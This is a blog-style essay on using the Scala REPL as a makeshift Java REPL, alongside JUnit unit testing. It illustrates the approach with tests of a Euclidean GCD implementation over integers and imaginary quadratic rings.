I have prepared a new app class and wrote a check method to apply my custome validations (As I mentioned in my earlier comment, Grade related validations from JOB).
Now, as you suggested, I will assign it in the criteria section and will perform necessary testing.
So is that all do I need to do OR anything else apart from this that I need to take care ?
Thanks,
Jack.
@Jack, yes, that is it.
Hi Jim,
Thakns a bunch for your quick help..!! I always find your blog very useful and also refer it to some of my friends and juniors to learn the things. Again thanks a lot for making this blog and helping the people. :)
I have created the App class with my custom validations.
Now, for one of the validation, I need to fetch reg_region field from JOB and to do so I need EMPLID, EFFDT, EMPL_RCD, EFFDT etc.
So I need help to know which record will be there in parameter of check method and how can I get the above details in custom app class.
Thanks,
Jack.
@Jack, it has been so long since I reviewed this, I can't remember what&REC_ and &bindRec_ contain. If I were investigating this, I would print &REC_.Name and &bindRec.Name to a log file.
Hi Jim,
Thanks for all you rsupport and this blog. I got all requirement and have created a app class and it is working fine.
Below are few points that I have researched and might be helpful to our other friends.
1. Parameter for the Check Procedure is nothing but a XREF record.
2. If you use the "User Entered" criteria type to provide criteria for your workflow, then below keep in mind the below points.
- you should have few common keys in between the header record & the record you are selecting in User entered criteria.
- Make sure your selected record fetches only top most row per employee. If not then you can create a new view to fetch top most row.
Thanks,
Jack.
Really quick question
I created an appPackage for my criteria... I am using the criteria in Multiple Stages
How do i Figure out what Stage I am processing at any point of time
I am assuming it is GetStageNbr from Some where
You must need to set the WORKFLOW trace for the same. You might need to change the code little bit, but you will get the step by step information on that.
Question About WorkFlow Monitor
I want to Reassign a user on a workflow I created...
On the requesition and Expense Sheet It works as expected...
Reassigns to new User , Sets work list to worked and creates a now Work List for the new user..
But on a New Workflow It Reassigns the New User, Sets the worklist to worked BUT it does not create the new work list entry... Am I missing some setting somewhere
Found the Issue, Needed to setup a Re-Assign event and all worked out great..
Hi,
How to confirm on clicking on a transaction whether this is final step in my AWE.
As I have to make certain fields editable on final step.
I know we can write SQL. However I found the function GetPendingSteps() also but not sure how to use it for the same. Is there any function or code which can help me with this will be great.
Regards,
Ashwin
I have created and AppPackage Similar to Beggining of this Post.
It is used in Multiple Stages and Steps..
How can I tell what Stage or step I am in while it is processing ??
I am also have an appPackage for the User List using something like below
But Again I need to know a way to get Stages and Step it is processing at..
import EOAW_CORE:DEFN:UserListBase;
import N_AUTH_PKG:Approval:Extended;
class Get_Req_Userlist extends EOAW_CORE:Defn:UserListBase
method Get_Req_Userlist(&rec_ As Record);
method GetUsers(&aryPrevOpr_ As array of string, &thread_ As Record) Returns array of string;
end-class;
Global Rowset &N_RS_Hier; /* Load In Approvals */
Global string &requestor_id;
Global string &N_AUTH_Key;
method Get_Req_Userlist
/+ &rec_ as Record +/
%Super = create EOAW_CORE:DEFN:UserListBase(&rec_);
end-method;
Hi Jim,
I have a question about Ad hoc approvers in AWE. Is it possible to add ad hoc approvers as 'Approvers' only and disable the feature to add them as 'Reviewers'?
I was looking at WEBLIB_EOAW.EOAW_MON_ADHOC.FieldFormula.IScript_Adhoc_Entry which is invoked when the '+' button next to approval step is clicked. It appears that the radio button for 'Reviewer' is static in the html EOAW_ADHOC_ENTRY_FORM.
I just wanted to check if you have come across this need before.
Thanks,
Tom
Jim Need some Guidance
I need to Create a Separate Worklist going to another component. And it has been a while...
I Know I need the WorkList Xref Record (_WL) Do I still need to create the Business Process & activity (and it has been so Long ago I do not remember)
But now in 8.54 Is there a Peoplecode example that you have lying around somewhere. That creates the WorkList entry with the Component I want to connect to
@travelingwilly, business process and activity... yes, it has been a long time since you created a workflow :). If you are on a 9.0+ application, odds are pretty high that you will want to use AWE. I have a free sample chapter that covers AWE and should get you going in the right direction.
Jim
Unfortunately this has nothing to do with workflow.... Just want to create A work list entry instead of an email to user or Role to do something..... I was hoping There was a More robust Programming way to do it, (Plus remembering all the Steps to create BP,Activity, mapping issues Etc.)
I got it to work. I was just hoping I could just Import a class , build A couple objects and then BAM Work list is created and sent to user or role
Hey Jim... Do you know if it's possible to change the route on the fly.. Based on something the approver has triggered?
.. Simple scenario
1. Transaction routed to a group (person A and B)
1.a. Person A approves the transaction and it routes to person C
Or
1.b. Person B approves the transaction and it routes to person D.
It's logic on the fly.. I always thought of AWE as a dumb engine after it is submitted and a route is created..it's just routes after that. But if there is pre-route logic that can be done.. I"m all ears.
Sincerely,
Thor
@Thor, it is a great question and one I can't remember. What I mean is, I can't remember if all of the approvers are determined at submission (I think they are for the approval viewer) or if they are determined after each approval step. I suggest you resubmit this question on the PeopleSoft OTN General Discussion forum.
|
http://jjmpsj.blogspot.com/2013/04/awe-workflow-application-class-criteria.html
|
CC-MAIN-2016-30
|
refinedweb
| 4,206
| 65.73
|
Let's talk about doing events, from two radically different perspectives, one great big external one and lots of teeny-weeny little internal ones.
I'll share some pictures from the European DevDay conference and snow in Munich today, then discuss a WPF issue that came up last week:
- DevDay conference in Munich
- WPF DoEvents
- Addendum on WPF versus WinForms
- Addendum on Not Using Revit API within WPF
DataContext
- WPF element id converter
DevDay Conference in Munich
Today we held the one and only European DevDay conference in Munich:
Jaime Rosales Duque came all the way from New York to help, and Jim Quanci even further, from San Francisco.
We have participants from all over Europe and even some from India.
The next few days are dedicated to an abbreviated Cloud Accelerator here that I am looking forward to very much.
Meanwhile, here is Maciej Szlek's WPF issue and solution:
WPF DoEvents
Exactly two months back, we discussed PickPoint with WPF and no threads attached.
Now another modeless WPF issue was raised and solved by Maciej 'Max' Szlek:
Question: I'm creating a WPF addin that performs operations which will take much time.
During this time the add-in dialogue don't respond until the operation ends, even when calling the external event Raise method by view-model command.
Do you have some workaround to achieve dialogue responsively during performing API operations?
Answer: Yes, I have heard about similar issues in the past involving blocking of modeless WPF forms.
Unfortunately, I cannot find the relevant thread any longer.
The workarounds involved stuff like setting the window focus, e.g. using GetForegroundWindow and SetForegroundWindow, and allowing the WPF form to access the Windows message queue.
I think Revit was somehow blocking the message queue, for some reason.
I think the solution involved calling the DoEvents method.
A couple of WPF issues came up in the forum in the past couple of years, e.g.:
- Revit API preventing WPF window regeneration
- WPF window loses control when Revit API displays an error
- WPF tutorial using WPF in Winforms
On the other hand, you can tell from these discussions that some people are successfully using WPF forms, and the development team are not aware of any issues with them.
I recommend sticking with Windows Forms if you have a choice.
Here is another recent article on modeless WPF forms, PickPoint and multithreading, addressing other issues that also might be of interest to you, an older one on WPF, and a comment on triggering an event from Jon.
Later, one little addition; I searched for "Revit API WPF DoEvents" and found this article on multithreading throwing exceptions in Revit 2015.
Response: I grabbed this DoEvents implementation on StackOverflow to "start work on a method that runs on the Dispatcher thread, and it needs to block without blocking the UI Thread... implement a DoEvents based on the Dispatcher itself".
I don't like it, it's not too elegant, it forces to break mvvm pattern, but it works.
If you would like to see my ugly non-refactored test code, clone my ExternalEventTests sample on BitBucket, also saved locally here on The Building Coder.
I haven't tested it much yet but it seems to be stable.
You can run it from the add-in manager – lack of static references to IExternalApplication.
On the occasion it allows to check if raised external events are queued or running next to each other. They are queued which is gooood but I think safer would be adapting below solution to the one external event – we don't know how the API engine will change in the future... ;) pattern for semi-asynchronous Idling API access...
Anyways thank you for your very accurate advice!
What would be in your circle of interest is WpfCommand.
WpfWindow contains a WPF implementation of the DoEvents method (in the way mentioned before) which is injected to ViewModel to minimize dependencies.
ViewModel contains 3 commands.
The first picks doors (it use part of my little cross API version framework) – simply to check how modeless WPF window would behave during hiding, picking and showing again.
The second and third flip doors – both have their own external event with different handler implementation. ViewModel's setStatus method calls injected DoEvents method.
If you have some more questions let me know.
Oh, and you can feel free to publish this solution on the blog of course, I don't have any problem with that ;)
Answer: When you mention picking and flipping doors, that reminds me of the Revit SDK ModelessDialog
ModelessForm_ExternalEvent and
ModelessForm_IdlingEvent samples.
Are you aware of those?
Is there any similarity, or is your sample completely unrelated to those?
Response: Yes, I'm aware of those, but my approach is quite different.
Congratulations to Max on solving this, and many thanks for sharing it here with us!
Addendum on WPF versus WinForms
Jeroen Van Vlierden adds an update:
Just to let you know: I noticed that you mentioned my thread on a WPF window losing control when Revit API displays an error above.
I can add to this that I managed to work around the issue by converting the wpf form to a user control and using this user control in a winforms window with a wpf element host.
That works fine.
It was however disappointing that I was forced to do this after I spent a lot of work on my application.
Converting the application to winforms is no longer an option, so I will stick to this for now.
Addendum on Not Using Revit API within WPF
DataContext
Hps Anave shares another nugget of WPF experience in the Revit API discussion forum thread on Revit API DLL preventing WPF window regeneration:
Well, after a very long time integrating WPF in my own programs, my recommendation is NOT to use any Revit API class inside the view model class where you assign to the WPF window's
DataContext.
If ever you want to pass or get any information coming from an element or a parameter, it is better to extract its element Id's
IntegerValue, and, when you are done with the WPF window, just create an
ElementIdfrom the integer value you acquired from the WPF window.
There may be other solutions out there but this is the solution I have so far.
Many thanks to Hps for sharing this!
WPF Element Id Converter
In the same thread, Gonçalo Feio shared his WPF element id converter, saying, This works for me:
public class ElementIdConverter : IValueConverter { public object Convert( object value, Type targetType, object parameter, CultureInfo culture ) { if( value is R.ElementId ) { return ( value as ElementId ).IntegerValue; } return -1; } public object ConvertBack( object value, Type targetType, object parameter, CultureInfo culture ) { if( value is string ) { int id; if( int.TryParse( value as string, out id ) ) { return new ElementId( id ); } } return ElementId.InvalidElementId; } }
In this case, I expose a ElementId property in the view model.
You can also add validation to give some feedback to the end user.
Many thanks to Gonçalo for sharing this!
|
http://thebuildingcoder.typepad.com/blog/2016/01/devday-conference-in-munich-and-wpf-doevents.html
|
CC-MAIN-2018-17
|
refinedweb
| 1,176
| 50.97
|
Unit testing is a widely accepted practice in most development shops in this day and age, especially with the advent of the tool JUnit. JUnit was so widely effective and used early on that it has been included in the default distribution of eclipse as long as I can remember and I have been programming professionally in Java for about 8 years. However, the drawbacks of not unit testing are concrete and arise acutely from time to time. This article aims to give a few specific examples of the perils of not unit testing.
Unit Testing Benefits
Unit testing has several basic tangible benefits that has reduced the painstaking troubles of the days when it was not widely used. Without getting into the specifics of the needs and arguments for unit testing, let’s simply highlight the benefits as they are universally accepted by Java development professionals, especially within the Agile community.
- an automated regression unit test suite has the ability to isolate bugs by unit, as tests focus on a unit and mock out all other dependencies
- unit tests give feedback to the developer immediately during the test, code, test, code rhythm of development
- unit tests find defects early in the life cycle.
- units tests provide a safety net that facilitates necessary refactoring to improve the design of code without breaking existing functionality
- unit tests, along with a code coverage tool, can produce tangible metrics such as code coverage which is valuable given good quality of tests
- unit tests provide an executable example of how client code can use the various interfaces of the code base.
- the code resulting from unit testing is typically more readable and concise, as code which is not so is difficult to unit test. Thus it follows that code which is written in tandem with unit tests tends to be more modular and higher quality.
Perils of Not Unit Testing
Let’s explore by example how not unit testing can adversely affect code and allow bugs to easily enter a code base. The focus will be on the method level where methods are simple and straight forward, yet there still can be problems when code is not unit tested.
Example 1: Reuse some code, but you introduce a bug
This example illustrates a situation where a developer has good intentions of reusing some code, but due to a lack of unit testing, the developer unintentionally introduces a bug. If unit tests exists, the developer could have safely refactored and could rely on the unit tests to inform him some requirement had not been covered.
Let’s introduce a simple scenario where a clothing store has as system that has users input sales of its clothes. Two objects in the system are: Shirt and ShirtSaleValidator. The ShirtSaleValidator checks the Shirt to see if the sale prices inputted are correct. In this case, a shirt sale price has to be between $0.01 and $15. (Note this example is overly simplified, but still illustrates the benefits of unit testing.)
Coder Joe implementes the isShirtSalePriceValid method but writes no unit tests. He follows the requirements correctly. The code is correct.
package com.assarconsulting.store.model; public class Shirt { private Double salePrice; private String type; public Shirt() { } public Double getSalePrice() { return salePrice; } public void setSalePrice(Double salePrice) { this.salePrice = salePrice; } public String getType() { return type; } public void setType(String type) { this.type = type; } }
package com.assarconsulting.store.validator; import com.assarconsulting.store.model.Shirt; import com.assarconsulting.store.utils.PriceUtility; public class ShirtSaleValidator { public ShirtSaleValidator() { } public boolean isShirtSalePriceValid(Shirt shirt) { if (shirt.getSalePrice() > 0 && shirt.getSalePrice() <= 15.00) { return true; } return false; } }
Coder Bob comes along and he is “refactor” minded, he loves the DRY principle and wants to reuse code. During some other requirement he implemented a Range object. He sees its usage in the shirt pricing requirement as well. Note that Bob is not extensively familiar with Joe’s requirement, but familiar enough to feel competent enough to make a change. In addition, their group abides by the Extreme Programming principle of collective ownership.
Thus, Bob nobly makes the change to reuse some code. He quickly translates the existing code to use the utility method, and moves on satisfied.
package com.assarconsulting.store.validator; import com.assarconsulting.store.model.Shirt; import com.assarconsulting.store.utils.Range; public class ShirtSaleValidator { public ShirtSaleValidator() { } public boolean isShirtSalePriceValid(Shirt shirt) { Range< Double > range = new Range< Double >(new Double(0), new Double(15)); if (range.isValueWithinRange(shirt.getSalePrice())) { return true; } return false; } }
package com.assarconsulting.store.utils; import java.io.Serializable; public class Range< T extends Comparable> implements Serializable { private T lower; private T upper; public Range(T lower, T upper) { this.lower = lower; this.upper = upper; } public boolean isValueWithinRange(T value) { return lower.compareTo(value) <= 0 && upper.compareTo(value) >= 0; } public T getLower() { return lower; } public T getUpper() { return upper; } }
Since there were no unit tests, a bug was created and never caught at time of implementation. This bug will go unnoticed until a developer or user specifically runs manual tests through the UI or some other client. What is the bug? The new code allows 0 to be a price of the Shirt, which is not specified by requirements.
This could have been easily caught if there was an existing set of unit tests to regression test this requirement. We could have a minimum set of simple tests that checked the range of prices for a shirt. The set of unit tests could run on each check in of code or each build. For example, the test suit could have asserted the following.
- $0 = price executes isShirtSalePriceValid to false
- $0.01 = price executes isShirtSalePriceValid to true
- $5 = price executes isShirtSalePriceValid to true
- $15 = price executes isShirtSalePriceValid to true
- $16 = price executes isShirtSalePriceValid to false
- $100 = price executes isShirtSalePriceValid to false
If Bob has these tests to rely on, the first bullet point test would have failed, and he would have caught his bug immediately.
Peril – Imagine hundreds of business requirements that are more complicated than this without unit testing. The compounding effect of not unit testing resulting in bugs, repeated code and difficult maintenance could be exponential compared to the safety net and reduced cost unit testing provides.
Example 2: Code not unit tested yields untestable code, which leads to unclean, hard to understand code.
Let’s continue the clothing store system example, which involves pricing of a shirt object. The business would like to introduce Fall Shirt Sale, which can be described as:
For the Fall, a shirt is eligible to be discounted by 20% if it is priced less than $10 and is a Polo brand. The Fall sales last from Sept 1, 2009 till Nov 15th 2009.
This functionality will be implemented in the ShirtSaleValidator class by Coder Joe who plans not to write unit tests. Since testing methods is not on his radar, he is not concerned with making the method testable, ie, making short and concise methods to not introduce too much McCabe’s cyclomatic complexity. Increased complexity is difficult to unit test as many test cases are necessary to achieve code coverage. His code is correct, but may turn out something like below.aleNotTestable(Shirt shirt) { Date today = new Date(); if (today.after(START_FALL_SALE_AFTER.getTime()) && today.before(END_FALL_SALE_BEFORE.getTime())) { if (shirt.getSalePrice() > 0 && shirt.getSalePrice() <= 10 ) { if (shirt.getType().equals("Polo")) { return true; } } } return false; } }
The problems with this code are numerous, including misplacement of logic according to OO principles and lack of Enums.
However, putting these other concerns aside, let’s focus on the readability of this this method. It is hard to ascertain the meaning of this code by just looking at it in a short amount of time. A developer has to study the code to figure out what requirements it is addressed. This is not optimal.
Now’s lets think about the testability of this method. If anyone was to test Joe’s code, after he decided to leave it this way due to his NOT unit testing, it would be very difficult to test. The code contains 3 nested if statements where 2 of them have ‘ands’ and they all net result in many paths through the code. The inputs to this test would be a nightmare. I view this type of code as a consequence of not following TDD, i.e. writing code without the intention of testing it.
A more TDD oriented way of writing this code would be as follows.ale(Shirt shirt) { return isFallSaleInSession() && isShirtLessThanTen(shirt) && isShirtPolo(shirt); } protected boolean isFallSaleInSession() { Date today = new Date(); return today.after(START_FALL_SALE_AFTER.getTime()) && today.before(END_FALL_SALE_BEFORE.getTime()); } protected boolean isShirtLessThanTen(Shirt shirt) { return shirt.getSalePrice() > 0 && shirt.getSalePrice() <= 10; } protected boolean isShirtPolo(Shirt shirt) { return shirt.getType().equals("Polo"); } }
From this code we can see that the method isShirtEligibleForFallSale() reads much like the requirement. The methods that compose it are readable. The requirements are broken up amongst the methods. We can test each component of the requirement separately with 2-3 test methods each. The code is clean and with a set of unit tests, there is proof of its correctness and a safety net for refactoring.
Peril – Writing code without the intention of testing can result in badly structured code as well as difficult to maintain code.
Conclusion
The above examples are only simple illustrations of the drawbacks of foregoing unit testing. The summation and compounding effect of the perils of not unit testing can make development difficult and costly to a system. I hope the illustrations above communicate the importance of unit testing code.
Source Code
peril-not-unit-testing.zip
Reference: GWT and HTML5 Canvas Demo from our JCG partner Nirav Assar at the Assar Java Consulting blog.
|
http://www.javacodegeeks.com/2012/05/perils-of-not-unit-testing.html
|
CC-MAIN-2015-22
|
refinedweb
| 1,624
| 55.54
|
FAQ What is the classpath of a plug-in?
Developers coming from a more traditional Java programming environment are often confused by classpath issues in Eclipse. A typical Java application has a global namespace made up of the contents of the JARs on a single universal classpath. This classpath is typically specified either with a command line argument to the VM or by an operating system environment variable. In Eclipse, each plug-in has its own unique classpath. This classpath contains the following, in lookup order:
- The OSGi parent class loader. All class loaders in OSGi have a common parent class loader. By default, this is set to be the Java boot class loader. The boot loader typically only knows about rt.jar, but the boot classpath can be augmented with a command line argument to the VM.
- The exported libraries of all imported plug-ins. If imported plug-ins export their imports, you get access to their exported libraries, too. Plug-in libraries, imports, and exports are all specified in the plugin.xml file.
- The declared libraries of the plug-in and all its fragments. Libraries are searched in the order they are specified in the manifest. Fragment libraries are added to the end of the classpath in an unspecified order.
In Eclipse 2.1, the libraries from the org.eclipse.core.boot and org.eclipse.core.runtime were also automatically added to every plug-in’s classpath. This is not true in 3.0; you now need to declare the runtime plug-in in your manifest’s requires section, as with any other plug-in.
See Also:
- FAQ What is the plug-in manifest file (plugin.xml)?
- FAQ How do I make my plug-in connect to other plug-ins?
- FAQ How do I add a library to the classpath of a plug-in?
- FAQ How can I share a JAR among various plug-ins?
- FAQ How do I use the context class loader in Eclipse?
- Pragmatic Advice on PDE Classpath
This FAQ was originally published in Official Eclipse 3.0 FAQs. Copyright 2004, Pearson Education, Inc. All rights reserved. This text is made available here under the terms of the Eclipse Public License v1.0.
|
http://wiki.eclipse.org/index.php?title=FAQ_What_is_the_classpath_of_a_plug-in%3F&oldid=25039
|
CC-MAIN-2016-50
|
refinedweb
| 368
| 68.87
|
Tokenizing JavaScript - A look at what’s left after minification
Minifiers
JavaScript minifiers are popular these days. Closure, YUI Compressor, Microsoft Ajax Minifier, to name a few. Using one is essential for any site that uses more than a little script and cares about performance.
Each tool of course has advantages and disadvantages. But they all do a pretty good job. The results vary only slightly in the grand scheme of things. Not enough to make so much of a difference that I’d say you should always use one over the other – use whatever fits in with your environment best.
Tag Clouds
Anyway, it got me thinking. After crunching a script through one of these bad boys, what’s left?
The first thing I did was take jQuery 1.4.2 (the minified version) and push it into the tag cloud creator, Wordle. BAM! Beautiful, isn’t it?
It’s not that surprising that two of the longest keywords in JavaScript also happen to use up the most space: return, and function. What does it matter? The word function appears in jQuery 404 times, adding up to 3,232 bytes. That’s about 4.5% of the size of the library! return appears 385 times, adding up to 2,310 bytes, or 3.2%. So there you go – return and function make up a total of almost 8% of the size of jQuery!
Really makes me wish JavaScript had C# style llamas – err, lambdas.
Tokenizing
There are some problems here though. No tag cloud generator I could find was intended to be run on code. So it ignores things like operators, brackets, etc. And you know things like semicolons are frequent. Nor do they provide any kind of data feed of the document’s tokens. So, I created my own tool to generate the data.
Basically, I just have a list of possible tokens, and I run a regular expression on the code to determine how many times each occurs. Then, multiply by its length to get the total size of that token in the script.
Results
It’s amazing what the results show. The top 15 tokens represent 35% of the entire script, mostly single-character tokens:
It makes sense that function is the top token in size since 8 characters long, even though it only occurs 404 times. But look at “.”. Yes, dot. It’s only one character long, but it represents 2,565 bytes. “(” and “)” together make up over 5k. return, despite being 6 characters long, is in 5th place.
What does it mean?
Well, actually, the fact that these syntax related tokens are so high on the list is partially a testament to the effectiveness of minifiers. A minifier can only remove so much of the syntax, and you can’t shorten them. So if a minifier is doing it’s job, they should tend bubble up to the top of the list.
Thankfully, Wordle supports an advanced mode that lets you enter the tokens and their weight manually. Armed with the output of this tool, here is the entire result set in tag cloud form. The relative sizes of the tags aren’t really correct though, simply because a “.” is smaller in whatever font than any letters. Also, I don’t really know why the first use of Wordle produced a cloud that shows return bigger than function – I guess just a bug in how it counts. All the more reason to use the advanced mode.
One thing it does is show ways that minifiers could do an even better job, or ways that we can code that reduce these tokens. For example, in theory a minifier could convert functions that use ‘return’ to assign to a parent-scope variable instead. That’s a fairly complex thing to do, so probably not worth it (performance seems equivalent, though). You can also try and structure your code so a function only has one ‘return’ instead of multiple.
This tool can help you find tokens in your code that use a lot of space besides these, too. For example, I applied this tool to the MicrosoftAjax.js script from .NET 3.5, and found to my horror that ‘JavaScriptSerializer’ was near the top of the list. And that is why in the AjaxControlToolkit you will find this script has been greatly reduced in size. Despite having many new features, it’s 10k smaller - in minified form - than it was in .NET 3.5., partially thanks to this tool to help me identify the areas that needed improvement.
Notice ‘getElementsByTagName’ appears in jQuery a noticeable amount. It occurs 17 times, or 340 bytes. Also not so obvious is how often characters ‘a’, ‘b’, etc occur. These are local variables that the minifier has converted to. ‘a’ is high on the list, since it is the first one used, but there are many in the top 100, all the way up to the letter ‘o’, totaling 5,228 bytes. So, a minifier could do well to understand how local variables are used and reuse existing ones when they are no longer needed.
The code is fairly simple. Again, this was something I wrote one evening off the cuff, so it’s not perfect (although, thanks to Brad and Damian for the nice LINQ way of converting the char array to a string array).
This is the code in C# for .NET 3.5.
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;
public static class Tokenizer {
public static IEnumerable<KeyValuePair<string, int>> Tokenize(string content) {
string[] tokens =
{ "===", "!==", "==", "<=", ">=", "!=", "-=", "+=", "*=", "/=", "|=", "%=", "^=", ">>=", ">>>=", "<<=",
"++", "--", "+", "-", "*", "\\", "/", "&&", "||", "&", "|", "%", "^", "~", "<<", ">>>", ">>",
"[", "]", "(", ")", ";", ".", "!", "?", ":", ",", "'", "\"", "{", "}" };
var escapedTokens = from token in tokens
select ("\\" + string.Join("\\",
(from c in token.ToCharArray() select c.ToString()).ToArray()));
string pattern = "[a-zA-Z_0-9\\$]+|" + string.Join("|", escapedTokens.ToArray());
var r = new Regex(pattern, RegexOptions.Compiled | RegexOptions.ExplicitCapture);
return from m in r.Matches(content).Cast<Match>()
group m by m.Value into g
orderby g.Count() descending
select new KeyValuePair<string, int>(g.Key, g.Count());
}
}
You can also download the raw CSV file with the results for jQuery here.
Update: Thanks to David Fowler for linq-ifying the code and making it half as long!
Happy coding!
|
http://weblogs.asp.net/infinitiesloop/tokenizing-javascript-a-look-at-what-s-left-after-minification
|
CC-MAIN-2015-14
|
refinedweb
| 1,034
| 76.01
|
Problem statement
In the problem ” Water Bottles” we are given two values namely” numBottle” which will store the total number of full water bottles and “numExchange” which will store the total number of empty water bottles we can exchange at a time and get a full water bottle.
After drinking water from a full water bottle it turns into an empty water bottle. Our task is to find out the maximum number of full water bottles we can drink.
Example
numBottles = 15, numExchange = 4
19
Explanation:
First round: drink 15 bottles of water gives 15 empty bottles.
Second round: from these 15 water bottles we get 3 full water bottles and left with 3 empty bottles. Drink 3 water bottles we now left with a total of 6 empty bottles.
Third round: from these 6 water bottles we get 1 full water bottle and left with 2 empty bottles. Drink 1 water bottles we now left with a total of 3 empty bottles.
As a minimum of 4 bottles is required to exchange the bottle we can not buy a full water bottle anymore. So the maximum number of water bottles that we can drink is 15+3+1=19.
Approach for Water Bottles Leetcode Solution
The basic approach to solve the problem is to do what questions ask.
- Drink all the full water bottles then it converts to empty water bottles.
- From all the empty water bottles buy full water bottles.
- Repeat these steps until we can not buy a full water bottle from an empty water bottle.
- Return the total number of full water bottles that we drunk during the process.
We can improve the complexity of the solution by making a few observations:
- We have numBottle number of the full water bottles so this will be the minimum number of full water bottles that we can drink.
- 1 full water bottle = 1 unit water+1 empty water bottle.
- From numExchange empty water bottles, we get 1 full water bottle(1 unit water + 1 empty water bottle). This thing can also be interpreted as (numExchange-1) water bottles give 1 unit of water.
- But if in the last round if we have (numExchange-1) number of empty bottles then we can not get one unit of water.
- So our result will be numBottle+(numBottle/(numExchange -1)) and if numBottle%(numExchange -1)==0 then subtract 1 from the final answer.
Implementation
C++ code for Water Bottles
#include <bits/stdc++.h> using namespace std; int numWaterBottles(int numBottles, int numExchange) { int ans= numBottles + (numBottles) / (numExchange - 1); if((numBottles) %(numExchange - 1)==0) ans--; return ans; } int main() { int numBottles = 15, numExchange = 4; int ans=numWaterBottles(numBottles,numExchange); cout<<ans<<endl; return 0; }
19
Java code for Water Bottles
import java.util.Arrays; import java.util.Set ; import java.util.HashSet; public class Tutorialcup { public static int numWaterBottles(int numBottles, int numExchange) { int ans= numBottles + (numBottles) / (numExchange - 1); if((numBottles) %(numExchange - 1)==0) ans--; return ans; } public static void main(String[] args) { int numBottles = 15, numExchange = 4; int ans=numWaterBottles(numBottles,numExchange); System.out.println(ans); } }
19
Complexity Analysis of Water Bottles Leetcode Solution
Time complexity
The time complexity of the above code is O(1).
Space complexity
The space complexity of the above code is O(1) because we are using only a variable to store answer.
|
https://www.tutorialcup.com/leetcode-solutions/water-bottles-leetcode-solution.htm
|
CC-MAIN-2021-04
|
refinedweb
| 556
| 52.7
|
Using the Scala REPL as a makeshift Java REPL
As you might already know, REPL stands for Read Evaluate Print Loop. It’s a way to try out things in a computer programming language on the command line and see immediate results.
You might also already know that Java is a programming language for the Java Virtual Machine (JVM), which can theoretically run on any computer, and that Scala is also a programming language for the JVM.
And that for a long time, Java did not really have a REPL, but Scala did, almost from its very beginning in 2006. And you can use the Scala REPL to run subroutines you’ve written in Java.
I know that there have been Java REPLs online for years. I have used one of them a few times, and another one once or twice. I am also aware of JShell, which was introduced with Java 9 (for now I lag behind with Java 8).
If you don’t feel like upgrading to Java 9 just yet (there are still legitimate reasons for that feeling), you can just use the Scala REPL.
Since Scala has access to pretty much everything in
java.lang, the Scala REPL would be a bona fide Java REPL if it weren’t that you have to use Scala syntax rather than Java syntax.
And you can load in a JAR that was compiled from Java source code and then you have access to anything that was declared
public therein. To my knowledge, no online Java REPL can do that.
Using the Scala REPL as a makeshift Java REPL might seem like the sort of solution that I should e-mail to 2008, when people would have cared about it.
However, using the Scala REPL for Java might actually be superior to JShell in some ways. For one thing, overloaded operators can be a major convenience.
As I learn more about Scala, the Scala REPL will become even more useful to me as a Java REPL.
Before I get to that, though, I should address why anyone who uses a unit testing framework like JUnit would have any need or want for a REPL.
After all, the reason I started using JUnit in the first place was because I realized that the very primitive and limited REPLs I had built into my biggest Java project at the time (a program that draws diagrams of prime numbers in imaginary quadratic integer rings) were inadequate for testing the various “moving parts” of the program.
With JUnit, I can write a test that checks, for example, my Legendre symbol implementation against a thousand pairs of prime numbers in a matter of seconds.
To run all the tests in my project should only take a minute, two at the most. That would take forever on a REPL, or even on a primitive test suite without assertions.
The thing, though, is: how do I know what needs to be tested and how to test it? One way is by trying things on a REPL.
I might not be able to test a thousand pairs of prime numbers at a REPL in a reasonable amount of time if I have to input them one at a time, but I can think of specific pairs of prime numbers that might be troublesome for my program but which I didn’t think to test for when writing my unit tests.
On the REPL, I can try one specific case of a given scenario, and if I see it doesn’t give me the result I expect, I write a test for several cases of that given scenario, have that test fail and then I get to work on fixing the program so it passes the test.
Take for instance the Euclidean greatest common divisor (GCD) algorithm. In the domain of Z, the familiar integers we all know so well, …, −3, −2, −1, 0, 1, 2, 3, …, it is easy to know what to test for in an implementation of the Euclidean GCD.
As usual, I’m not going to get too in depth on the math here. If you’re curious about the mathematical aspect of it, you should be able to find more information in elementary number theory books, on Wolfram MathWorld and in the OEIS.
So, to test an implementation of the Euclidean GCD in Z, you’ll want to test that pairs of consecutive integers have a GCD of 1, and the same goes for pairs of consecutive odd integers.
Pairs of consecutive Fibonacci numbers (e.g., 21 and 34, 34 and 55) should also be identified as coprime. Pairs of consecutive even integers should have a GCD of 2.
If your GCD implementation gives results different than these, then you know your implementation has a problem. Here’s one unit test I would write:
@Test
public void testEuclideanGCDWithFibonacciNumbers() {
int fibo1 = 0;
int fibo2 = 1;
int fiboSum;
while (fibo2 < Integer.MAX_VALUE/8) {
fiboSum = fibo1 + fibo2;
fibo1 = fibo2;
fibo2 = fiboSum;
assertEquals(1, euclideanGCD(fibo1, fibo2));
}
}
How do I test that
euclideanGCD(a, b) works correctly in, say, Z[i]? Or how about Z[ √−2]?
The only things I was sure about at the beginning is that
euclideanGCD(a, b) should throw an exception if
a and
b are from different domains, and another exception if both
a and
b are from the same non-Euclidean domain, like the famous Z[ √−5].
I can certainly write tests for exceptions, whether with annotations or with a good old-fashioned try-fail-catch.
But to figure out tests for the normal functioning of
euclideanGCD(a, b) with
a and
b both integers from the same Euclidean imaginary quadratic ring, I needed a REPL in which to try out different kinds of pairs.
And so it was thanks to the Scala REPL that I discovered that my implementation of the Euclidean GCD algorithm seemed to give the right result for gcd(−3/2 + (√−7)/2, 8) but would crash when asked to compute gcd(−3/2 + (√−7)/2, 10).
The latter computation would cause an
ArrayIndexOutOfBoundsException, which led me to find that I had made a mistake with the checking of norms when
a is not divisible by
b.
This contradicted my early hunch that a mistake of that sort would cause a
NullPointerException. I think at one point I actually wrote a unit test that expected a
NullPointerException to happen, not an
ArrayIndexOutOfBoundsException.
Maybe I still would have eventually discovered that problem without the help of a REPL. But with the REPL, it’s much easier to ask “What about this other case?”
I have to confess that I was and still am confused about how to actually install the Scala REPL on your system, even though it’s obviously something I have done on my system.
I had IntelliJ download the Scala plug-in, but, as far as I can tell, that does not include the Scala REPL. Next I downloaded LLVM/Clang, but still, no Scala REPL.
If I remember correctly, what I finally did to get the Scala REPL was to go to the Scala downloads page, scroll down to “Other ways to install Scala” and click the “Download the Scala binaries for Windows” link.
I did take a look at Ammonite, which is said to be “a popular Scala REPL,” but I have not installed it, much less used it.
Okay, now we can get to the nuts and bolts of actually using the Scala REPL as a Java REPL.
